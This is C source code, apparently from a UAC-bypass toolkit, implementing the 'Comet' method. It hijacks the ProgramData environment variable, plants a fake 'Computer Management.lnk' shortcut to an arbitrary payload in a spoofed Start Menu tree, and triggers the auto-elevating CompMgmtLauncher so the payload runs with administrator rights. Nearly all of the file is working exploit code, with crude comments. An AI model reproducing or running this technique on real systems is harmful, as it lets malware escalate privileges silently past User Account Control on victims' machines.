/*
* @implemented
*/
BOOL
WINAPI
Wow64RevertWow64FsRedirection(IN PVOID OldValue)
{
NTSTATUS Status;
BOOL Result;
Status = RtlWow64EnableFsRedirectionEx(OldValue, &OldValue);
if (NT_SUCCESS(Status))
{
Result = TRUE;
}
else
{
BaseSetLastNTError(Status);
Result = FALSE;
}
return Result;
}
/*
* ucmCometMethod
*
* Purpose:
*
* Fool autoelevated application with help of manipulation of the current user environment variables.
* CompMgmtLauncher.exe is a moronic .LNK ShellExecute launcher application.
* Only MS do system trusted applications which only purpose is to LAUNCH .LNK files.
*
*/
BOOL ucmCometMethod(
_In_ LPWSTR lpszPayload
)
{
#ifndef _WIN64
PVOID OldValue = NULL;
#endif
BOOL bCond = FALSE, bResult = FALSE;
WCHAR szCombinedPath[MAX_PATH * 2], szLinkFile[MAX_PATH * 3];
HRESULT hResult;
IPersistFile *persistFile = NULL;
IShellLink *newLink = NULL;
SHELLEXECUTEINFO shinfo;
if (lpszPayload == NULL)
return FALSE;
#ifndef _WIN64
if (g_ctx.IsWow64) {
if (!NT_SUCCESS(RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue)))
return FALSE;
}
#endif
do {
RtlSecureZeroMemory(szCombinedPath, sizeof(szCombinedPath));
_strcpy(szCombinedPath, g_ctx.szTempDirectory);
_strcat(szCombinedPath, L"huy32");
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
_strcpy(szLinkFile, szCombinedPath);
_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
if (!CreateDirectory(szLinkFile, NULL)) {//%temp%\<targetdir>\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
if (!supSetEnvVariable(FALSE, T_PROGRAMDATA, szCombinedPath))
break;
_strcat(szCombinedPath, TEXT("\\Microsoft"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
_strcat(szCombinedPath, TEXT("\\Windows"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
_strcat(szCombinedPath, TEXT("\\Start Menu"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
_strcat(szCombinedPath, TEXT("\\Programs"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
_strcat(szCombinedPath, TEXT("\\Administrative Tools"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs\Administrative Tools
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
hResult = CoInitialize(NULL);
if (SUCCEEDED(hResult)) {
hResult = CoCreateInstance(&CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, &IID_IShellLink, (LPVOID *)&newLink);
if (SUCCEEDED(hResult)) {
newLink->lpVtbl->SetPath(newLink, lpszPayload);
newLink->lpVtbl->SetArguments(newLink, L"");
newLink->lpVtbl->SetDescription(newLink, L"Comet method");
hResult = newLink->lpVtbl->QueryInterface(newLink, &IID_IPersistFile, (void **)&persistFile);
if (SUCCEEDED(hResult)) {
_strcpy(szLinkFile, szCombinedPath);
_strcat(szLinkFile, L"\\Computer Management.lnk");
if (SUCCEEDED(persistFile->lpVtbl->Save(persistFile, szLinkFile, TRUE))) {
persistFile->lpVtbl->Release(persistFile);
_strcpy(szCombinedPath, g_ctx.szTempDirectory);
_strcat(szCombinedPath, L"huy32");
_strcpy(szLinkFile, szCombinedPath);
_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = szLinkFile;
shinfo.lpParameters = L"";
shinfo.lpVerb = MANAGE_VERB;
shinfo.lpDirectory = szCombinedPath;
shinfo.nShow = SW_SHOW;
if (ShellExecuteEx(&shinfo)) {
CloseHandle(shinfo.hProcess);
bResult = TRUE;
}
}
}
newLink->lpVtbl->Release(newLink);
}
}
} while (bCond);
#ifndef _WIN64
if (g_ctx.IsWow64) {
RtlWow64EnableFsRedirectionEx(OldValue, &OldValue);
}
#endif
supSetEnvVariable(TRUE, T_PROGRAMDATA, NULL);
return bResult;
}
